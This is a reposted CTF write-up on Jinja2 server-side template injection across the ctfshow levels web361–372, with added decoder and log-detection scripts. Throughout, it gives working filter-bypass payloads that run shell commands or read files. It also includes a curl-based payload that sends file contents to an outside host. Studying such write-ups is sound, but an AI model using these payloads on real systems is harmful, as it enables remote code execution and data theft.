ctfshow web beginner track: SSTI

web361

No filtering at all; any payload works.
payload:

?name={{url_for.__globals__['os']['popen']("cat /flag").read()}}

web362

The challenge says a filter was added, but the previous challenge's payload still goes through.

web363

The double quote " is filtered.
It can be bypassed with request.args.a.
Example:

{{()[request.args.a][request.args.b][-1][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__

This is equivalent to running ().__class__.__mro__[-1].__subclasses__(); as you can see, this method not only dispenses with the quotes " ", the same method also works when the comma is filtered.
payload:

?name={{url_for.__globals__[request.args.a][request.args.b](request.args.c).read()}}&a=os&b=popen&c=cat /flag

web364

Quotes and args are filtered.
chr() can be used to get around this, but chr() is not available by default: you have to reach it and define it yourself. chr() lives in builtins.
How chr() is defined:

{% set chr=url_for.__globals__.__builtins__.chr %}
chr(111)%2bchr(115) // os (%2b is the URL-encoded '+')
chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(42) // cat /f*

payload:

?name={% set chr=url_for.__globals__.__builtins__.chr %}{{url_for.__globals__[chr(111)%2bchr(115)].popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(42)).read()}}

web365

Quotes, args and square brackets are filtered.
__getitem__() can be used in place of [].
Example:

"".__class__.__mro__[2]
"".__class__.__mro__.__getitem__(2) // __getitem__(2) is the same as [2]

So all that is needed is to replace __globals__[chr(111)%2bchr(115)] with __globals__.__getitem__(chr(111)%2bchr(115))
payload:

?name={% set chr=url_for.__globals__.__builtins__.chr %}{{url_for.__globals__.__getitem__(chr(111)%2bchr(115)).popen(chr(99)%2bchr(97)%2bchr(116)%2bchr(32)%2bchr(47)%2bchr(102)%2bchr(42)).read()}}

web366

Quotes, args, square brackets and underscores are filtered.
lipsum can run os commands: {{lipsum.__globals__['os'].popen('ls').read()}}; combine it with the attr filter.
payload:

?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}
cookie: a=__globals__;b=cat /flag

web367

Quotes, args, square brackets, underscores and os are filtered.
Just pass os through request as well, as in the previous challenge's payload.
payload:

?name={{(lipsum|attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}}
cookie: a=__globals__;b=os;c=cat /flag
When args is filtered, values can be used instead: args holds GET parameters and values holds POST parameters, but when POST is disabled values can also be supplied via GET.
?name={{(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()}}&a=__globals__&b=os&c=cat /flag

web368

Quotes, args, square brackets, underscores, os and curly braces are filtered.
{%%} can be used in place of {{}}.
payload:

?name={%print((lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read())%}&a=__globals__&b=os&c=cat%20/flag

web369

Quotes, args, square brackets, underscores, os, curly braces and request are filtered.
The filtering is very tight, so set statements are used to build the symbols and methods we need.
payload:

/?name=
{% set pop=dict(pop=a)|join%}
{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18) %}
{% set gb=(xiahuaxian,xiahuaxian,dict(glo=a,bals=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set get=dict(get=a)|join%}{% set o=dict(o=a,s=a)|join %}
{% set popen=dict(popen=a)|join%}
{% set cat=dict(cat=a)|join%}
{% set id=dict(index=a)|join%}
{% set bin=(xiahuaxian,xiahuaxian,dict(builtins=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set cr=dict(ch=a,r=a)|join%}
{% set chr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}
{% set xiegang=chr(47)%}
{% set read=dict(read=a)|join%}
{% set space=chr(32) %}
{% set shell=(cat,space,xiegang,dict(flag=a)|join)|join %}

{% print(shell)%}
{%print(lipsum|attr(gb)|attr(get)(o)|attr(popen)(shell)|attr(read)())%}

Master Yu's bypass technique

?name=
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr(47)%2bchr(102)%2bchr(108)%2bchr(97)%2bchr(103)%}
{%print(x.open(file).read())%}

web370

Quotes, args, square brackets, underscores, os, curly braces, request and digits are filtered.
Digits can be obtained from lipsum|string|list, or by computing a string's length with filters such as count and length.
Example:

{% set ff=dict(f=a)|join%}
{% set one=(lipsum|string|list)|attr(id)(ff) %}
length
{% set c=dict(c=z)|join|length %}
count
{% set c=dict(c=z)|join|count %}

payload:

?name=
{% set nn=dict(n=a)|join%}
{% set tt=dict(t=a)|join%}
{% set ff=dict(f=a)|join%}
{% set dd=dict(index=a)|join%}
{% set id=dict(ind=a,ex=a)|join%}
{% set five=(lipsum|string|list)|attr(id)(tt) %}
{% set three=(lipsum|string|list)|attr(id)(nn) %}
{% set one=(lipsum|string|list)|attr(id)(ff) %}
{% set aa=three*five--one--one--one%}
{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(aa) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glo=a,bals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set get=dict(get=a)|join%}{% set o=dict(o=a,s=a)|join %}{% set popen=dict(popen=a)|join%}{% set ca=dict(ca=a,t=a)|join%}
{% set bin=(xiahuaxian,xiahuaxian,dict(built=a,ins=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set cr=dict(ch=a,r=a)|join%}
{% set chcr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}
{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set dh=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set rd=dict(re=a,ad=a)|join%}
{% set ls=dict(ls=a)|join%}
{% set space=chcr(three*three*five-five-five-three) %}
{% set shell=(ca,space,xiegang,dict(flag=a)|join)|join %}

{% print(shell)%}
{%print(lipsum|attr(gb)|attr(get)(o)|attr(popen)(shell)|attr(rd)())%}

Master Yu's bypass technique:

?name=
{% set c=(dict(e=a)|join|count)%}
{% set cc=(dict(ee=a)|join|count)%}
{% set ccc=(dict(eee=a)|join|count)%}
{% set cccc=(dict(eeee=a)|join|count)%}
{% set ccccccc=(dict(eeeeeee=a)|join|count)%}
{% set cccccccc=(dict(eeeeeeee=a)|join|count)%}
{% set ccccccccc=(dict(eeeeeeeee=a)|join|count)%}
{% set cccccccccc=(dict(eeeeeeeeee=a)|join|count)%}
{% set coun=(cc~cccc)|int%}
{% set po=dict(po=a,p=a)|join%}
{% set a=(()|select|string|list)|attr(po)(coun)%}
{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}
{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}
{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}
{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}
{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}
{% set chr=x.chr%}
{% set file=chr((cccc~ccccccc)|int)%2bchr((cccccccccc~cc)|int)%2bchr((cccccccccc~cccccccc)|int)%2bchr((ccccccccc~ccccccc)|int)%2bchr((cccccccccc~ccc)|int)%}
{%print(x.open(file).read())%}
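The string- and number-building blocks used from web364 through web370 (chr() chains, dict(...)|join, lipsum|string|list indexed with pop or index, count/length, and the ~ concatenation) are quick to write but tedious to read back from a log. The following Python is an added example, not code from the original post: a small resolver that replays the {% set %} statements of a captured ?name= value and reports the plain value each variable ends up holding. The stringified lipsum and ()|select objects it indexes into are constructed stand-ins (assumed to match the real ones up to the memory address), SAMPLE is a constructed payload modelled on the web370 one above, and any construct it does not understand is left as a <?expr?> marker rather than guessed.

```python
"""Decode the string/number-building tricks in the filtered-SSTI payloads above.
Added example, not code from the original post: decode_payload() replays the
{% set %} statements of a captured ?name= value in order and returns the plain
value each variable ends up holding. Only the building blocks shown on this page
are understood; anything else is kept as a <?expr?> marker."""
import ast
import re
from urllib.parse import unquote

SET_RE = re.compile(r"\{%\s*set\s+(\w+)\s*=\s*(.*?)\s*%\}", re.S)
DICT_JOIN_RE = re.compile(r"\(?dict\(([^()]*)\)\|join(?:\(\))?(\|length|\|count)?\)?")  # keys joined
CONCAT_INT_RE = re.compile(r"\((\w+)~(\w+)\)\|int")  # (cc~cccc)|int -> 24
TUPLE_JOIN_RE = re.compile(r"\((.*)\)\|join(?:\(\))?", re.S)
LISTOP_RE = re.compile(r"\((lipsum|\(\)\|select)\|string\|list\)(?:\|attr\((\w+)\)|\.(pop))\((.+)\)")
CHR_CHAIN_RE = re.compile(r"\(lipsum\|attr\((\w+)\)\)\|attr\((\w+)\)\((\w+)\)\|attr\((\w+)\)\((\w+)\)")
CALL_RE = re.compile(r"(\w+)\((.+)\)", re.S)  # a call named chr (or bound to chr) is builtins.chr
# Constructed stand-ins for str(lipsum) and str(()|select): only the text before the address is stable.
SOURCES = {"lipsum": "<function generate_lorem_ipsum at 0x7f0000000000>",
           "()|select": "<generator object select_or_reject at 0x7f0000000000>"}
OPS = {ast.Mult: lambda a, b: a * b, ast.Sub: lambda a, b: a - b, ast.Add: lambda a, b: a + b}


def eval_int(expr, env):  # arithmetic such as three*five--one over int variables; + - * and unary minus only
    def walk(node):
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.Name) and isinstance(env.get(node.id), int):
            return env[node.id]
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        if isinstance(node, ast.BinOp) and type(node.op) in OPS:
            return OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(expr)
    try:
        return walk(ast.parse(expr.strip(), mode="eval").body)
    except (ValueError, SyntaxError):
        return None


def split_top_level(text):  # split on commas that are not nested inside parentheses
    parts, depth, cur = [], 0, []
    for ch in text:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            parts.append("".join(cur)); cur = []
        else:
            cur.append(ch)
    return parts + ["".join(cur)]


def resolve(expr, env):
    """Return the str or int an expression stands for, or a <?expr?> marker."""
    expr = expr.strip()
    if expr in env:
        return env[expr]
    m = DICT_JOIN_RE.fullmatch(expr)                       # dict(glo=a,bals=a)|join -> "globals"
    if m:
        text = "".join(kv.split("=", 1)[0].strip() for kv in m.group(1).split(",") if kv.strip())
        return len(text) if m.group(2) else text
    m = CONCAT_INT_RE.fullmatch(expr)                      # (cc~cccc)|int -> 24
    if m and all(isinstance(resolve(g, env), int) for g in m.groups()):
        return int("".join(str(resolve(g, env)) for g in m.groups()))
    calls = [CALL_RE.fullmatch(p.strip()) for p in expr.split("+")]  # chr(99)%2bchr(97), or chcr(..) once chcr is chr
    if all(c and (c.group(1) == "chr" or env.get(c.group(1)) is chr) for c in calls):
        codes = [resolve(c.group(2), env) for c in calls]
        if all(isinstance(code, int) for code in codes):
            return "".join(map(chr, codes))
    m = LISTOP_RE.fullmatch(expr)                          # (lipsum|string|list)|attr(pop)(18) -> "_"
    if m:
        src, arg, method = SOURCES[m.group(1)], resolve(m.group(4), env), m.group(3) or resolve(m.group(2), env)
        if method == "pop" and isinstance(arg, int) and -len(src) <= arg < len(src):
            return src[arg]
        if method == "index" and isinstance(arg, str) and arg in src:
            return src.index(arg)
    m = CHR_CHAIN_RE.fullmatch(expr)                       # lipsum.__globals__.get(__builtins__).get(chr)
    if m and [resolve(g, env) for g in m.groups()] == ["__globals__", "get", "__builtins__", "get", "chr"]:
        return chr
    m = TUPLE_JOIN_RE.fullmatch(expr)                      # (x,x,dict(glo=a,bals=a)|join,x,x)|join
    if m:
        return "".join(str(resolve(p, env)) for p in split_top_level(m.group(1)))
    value = eval_int(expr, env)
    return value if value is not None else "<?%s?>" % expr


def decode_payload(query_value):
    """Resolve every {% set %} in a (possibly URL-encoded) ?name= value, in order."""
    env = {}
    for name, rhs in SET_RE.findall(unquote(query_value)):
        env[name] = resolve(rhs, env)
    return env


# Constructed sample modelled on the web370 payload above (not copied verbatim).
SAMPLE = (
    "{% set nn=dict(n=a)|join%}{% set tt=dict(t=a)|join%}{% set ff=dict(f=a)|join%}{% set id=dict(ind=a,ex=a)|join%}"
    "{% set pop=dict(pop=a)|join%}{% set get=dict(get=a)|join%}{% set o=dict(o=a,s=a)|join %}{% set cr=dict(ch=a,r=a)|join%}"
    "{% set five=(lipsum|string|list)|attr(id)(tt) %}{% set three=(lipsum|string|list)|attr(id)(nn) %}"
    "{% set one=(lipsum|string|list)|attr(id)(ff) %}{% set aa=three*five--one--one--one%}"
    "{% set xhx=(lipsum|string|list)|attr(pop)(aa) %}{% set gb=(xhx,xhx,dict(glo=a,bals=a)|join,xhx,xhx)|join %}"
    "{% set bin=(xhx,xhx,dict(built=a,ins=a)|join,xhx,xhx)|join %}{% set chcr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}"
    "{% set xiegang=chcr(three*three*five--one--one)%}{% set space=chcr(three*three*five-five-five-three) %}"
    "{% set shell=(dict(ca=a,t=a)|join,space,xiegang,dict(flag=a)|join)|join %}"
)
```

Running decode_payload(SAMPLE) gives five=5, three=3, one=1 (the positions of "t", "n" and "f" in the stringified lipsum function), aa=18, xhx="_", gb="__globals__", bin="__builtins__", chcr resolved to the chr builtin, xiegang="/", space=" " and shell="cat /flag", which is what an analyst needs to know about the request without re-running it. Because lookups are ordered and anything unknown becomes a marker, the same function also handles the web369 and Master Yu payloads above, where lipsum|attr(...)(...) chains that cannot be resolved statically show up as markers while the attribute names and the file path "/flag" still decode.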

web371

Quotes, args, square brackets, underscores, os, curly braces, request, digits and print are filtered.
With print disabled, the only option left is exfiltrating the result with curl.

?name=
{% set c=dict(c=z)|join|length %}
{% set cc=dict(cc=z)|join|length %}
{% set ccc=dict(ccc=z)|join|length %}
{% set cccc=dict(cccc=z)|join|length %}
{% set ccccc=dict(ccccc=z)|join|length %}
{% set cccccc=dict(cccccc=z)|join|length %}
{% set ccccccc=dict(ccccccc=z)|join|length %}
{% set cccccccc=dict(cccccccc=z)|join|length %}
{% set ccccccccc=dict(ccccccccc=z)|join|length %}
{% set cccccccccc=dict(cccccccccc=z)|join|length %}
{% set space=(()|select|string|list).pop(ccccc*cc) %}
{% set xhx=(()|select|string|list).pop(ccc*cccccccc) %}
{% set point=(config|string|list).pop(cccccccccc*cc*cccccccccc-ccccccccc) %}
{% set maohao=(config|string|list).pop(cc*ccccccc) %}
{% set xiegang=(config|string|list).pop(-cccccccc*cccccccc) %}
{% set globals=(xhx,xhx,dict(globals=z)|join,xhx,xhx)|join %}
{% set builtins=(xhx,xhx,dict(builtins=z)|join,xhx,xhx)|join %}
{% set open=(lipsum|attr(globals)).get(builtins).open %}
{% set result=open((xiegang,dict(flag=z)|join)|join).read() %}
{% set curlcmd=(dict(curl=z)|join,space,dict(http=z)|join,maohao,xiegang,xiegang,cccc,ccccccccc,point,cc,ccc,cc,point,ccccccc,cccccc,point,c,cccc,maohao,cccc,c-c,c-c,c-c,xiegang,result)|join %} 
{% set ohs=dict(o=z,s=z)|join %}
{% set shell=(lipsum|attr(globals)).get(ohs).popen(curlcmd) %}

web372

Quotes, args, square brackets, underscores, os, curly braces, request, digits, print and count are filtered.
The previous challenge's payload goes straight through, because count is filtered but length is not.
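Read as a series, web361 to web372 make one point: every blocklist (quotes, args, [], _, os, {{, request, digits, print, count) was sidestepped by writing the same template a different way, so filtering keywords out of user input is not a fix; the fix is to never place user input in the template source and to pass it as a context variable instead. What no bypass can drop is the Jinja syntax itself, which is what a log-side detector should key on. The Python below is an added example, not part of the original writeup: it percent-decodes each request target until the result stops changing and then flags the template delimiters and Jinja-only constructs the payloads above rely on. The access-log lines are constructed samples in common log format with a made-up client address.

```python
"""Flag server-side template injection probes in web-server access logs.
Added example, not part of the original post. Every filter above was sidestepped
by rewriting the same template differently; what no variant can drop is Jinja
syntax itself, so the detector decodes each request target until it stops
changing and then keys on template delimiters and the Jinja-only constructs
the payloads rely on."""
import re
from urllib.parse import unquote

INDICATORS = {
    "template_delimiter": re.compile(r"\{\{|\{%"),
    "dunder_attribute": re.compile(r"__\w+__"),
    "attr_filter": re.compile(r"\|\s*attr\s*\("),
    "string_builder": re.compile(r"dict\([^)]*\)\s*\|\s*join|\|\s*string\s*\|\s*list"),
    "jinja_globals": re.compile(r"\b(lipsum|url_for|config|request\.(args|values|cookies|form))\b"),
    "chr_chain": re.compile(r"chr\(\s*\d+\s*\)(\s*\+\s*chr\(\s*\d+\s*\))+"),
}
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def normalize(text, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (probes are often double-encoded)
    and fold case so {%PRINT is seen like {%print. '+' is deliberately not turned into
    a space: in these payloads it is the concatenation operator (sent as %2b)."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text.lower()


def scan_target(target):
    """Names of the indicators that fire on one decoded request target."""
    text = normalize(target)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_log(lines):
    """(line, indicators) for every access-log line whose request target looks like SSTI."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        found = scan_target(m.group("target")) if m else []
        if found:
            hits.append((line, found))
    return hits


# Constructed access-log lines (common log format); the payload shapes follow the
# challenges above, the client address and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Nov/2021:10:00:01 +0000] "GET /?name=alice HTTP/1.1" 200 512',
    '10.0.0.5 - - [20/Nov/2021:10:00:02 +0000] "GET /?name=%7B%7Burl_for.__globals__%5B%27os%27%5D%7D%7D HTTP/1.1" 200 640',
    '10.0.0.5 - - [20/Nov/2021:10:00:03 +0000] "GET /?name=%7B%25print((lipsum%7Cattr(request.values.a)).get(request.values.b))%25%7D&a=__globals__&b=os HTTP/1.1" 200 640',
    '10.0.0.5 - - [20/Nov/2021:10:00:04 +0000] "GET /?name=%7B%25%20set%20pop=dict(pop=a)%7Cjoin%25%7D%7B%25%20set%20x=(lipsum%7Cstring%7Clist)%7Cattr(pop)(18)%20%25%7D HTTP/1.1" 200 640',
    '10.0.0.5 - - [20/Nov/2021:10:00:05 +0000] "GET /search?q=price+%3C+100+%7Bdiscount%7D HTTP/1.1" 200 300',
    '10.0.0.5 - - [20/Nov/2021:10:00:06 +0000] "GET /?name=chr(99)%2bchr(97)%2bchr(116) HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for line, found in scan_log(SAMPLE_LOG):
        print(", ".join(found), "<-", line)
```

On the sample log the first and fifth lines stay quiet (a plain name and a single brace in an ordinary search query), while the web361-, web368-, web369- and web364-shaped targets are reported with the indicators that fired. The `template_delimiter` rule alone would catch every payload on this page; the other rules exist so that an alert carries a reason an analyst can act on, and so that a `{%`-less fragment such as a bare chr() chain is still surfaced.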

Commonly used payloads

Adding two commonly used payloads; on challenges with strict filtering they can be modified and reused as they are (doge).

Ultimate-filter payload:

{% set pop=dict(pop=a)|join%}{% set xiahuaxian=(lipsum|string|list)|attr(pop)(18) %}{% set gb=(xiahuaxian,xiahuaxian,dict(glo=a,bals=a)|join,xiahuaxian,xiahuaxian)|join %}{% set get=dict(get=a)|join%}{% set os=dict(os=a)|join %}{% set popen=dict(popen=a)|join%}{% set ca=dict(ca=a,t=a)|join%}
{% set nn=dict(n=a)|join%}
{% set tt=dict(t=a)|join%}
{% set ff=dict(f=a)|join%}
{% set dd=dict(index=a)|join%}
{% set id=dict(ind=a,ex=a)|join%}
{% set five=(lipsum|string|list)|attr(id)(tt) %}
{% set three=(lipsum|string|list)|attr(id)(nn) %}
{% set one=(lipsum|string|list)|attr(id)(ff) %}
{% set bin=(xiahuaxian,xiahuaxian,dict(built=a,ins=a)|join,xiahuaxian,xiahuaxian)|join %}
{% set cr=dict(ch=a,r=a)|join%}
{% set chcr=(lipsum|attr(gb))|attr(get)(bin)|attr(get)(cr) %}
{% set xiegang=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set dh=chcr(three*five*five-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one-one)%}
{% set rd=dict(re=a,ad=a)|join%}
{% set ls=dict(ls=a)|join%}

{% set space=chcr(three*three*five-five-five-three) %}
{% set shell=(ca,space,dict(f1ag=a)|join,dh,dict(txt=a)|join)|join %}

{% print(shell)%}
{%print(lipsum|attr(gb)|attr(get)(os)|attr(popen)(shell)|attr(rd)())%}

Exfiltration payload:

?name=
{% set c=dict(c=z)|join|length %}
{% set cc=dict(cc=z)|join|length %}
{% set ccc=dict(ccc=z)|join|length %}
{% set cccc=dict(cccc=z)|join|length %}
{% set ccccc=dict(ccccc=z)|join|length %}
{% set cccccc=dict(cccccc=z)|join|length %}
{% set ccccccc=dict(ccccccc=z)|join|length %}
{% set cccccccc=dict(cccccccc=z)|join|length %}
{% set ccccccccc=dict(ccccccccc=z)|join|length %}
{% set cccccccccc=dict(cccccccccc=z)|join|length %}
{% set space=(()|select|string|list).pop(ccccc*cc) %}
{% set xhx=(()|select|string|list).pop(ccc*cccccccc) %}
{% set point=(config|string|list).pop(cccccccccc*cc*cccccccccc-ccccccccc) %}
{% set maohao=(config|string|list).pop(cc*ccccccc) %}
{% set xiegang=(config|string|list).pop(-cccccccc*cccccccc) %}
{% set globals=(xhx,xhx,dict(globals=z)|join,xhx,xhx)|join %}
{% set builtins=(xhx,xhx,dict(builtins=z)|join,xhx,xhx)|join %}
{% set open=(lipsum|attr(globals)).get(builtins).open %}
{% set result=open((xiegang,dict(flag=z)|join)|join).read() %}
{% set curlcmd=(dict(curl=z)|join,space,dict(http=z)|join,maohao,xiegang,xiegang,cccc,ccccccccc,point,cc,ccc,cc,point,ccccccc,cccccc,point,c,cccc,maohao,cccc,c-c,c-c,c-c,xiegang,result)|join %} 
{% set ohs=dict(o=z,s=z)|join %}
{% set shell=(lipsum|attr(globals)).get(ohs).popen(curlcmd) %}

SSTI is still the most fun, hahahahahahahaha *hic*~ confetti~


Reposted from: blog.csdn.net/weixin_54902210/article/details/121474509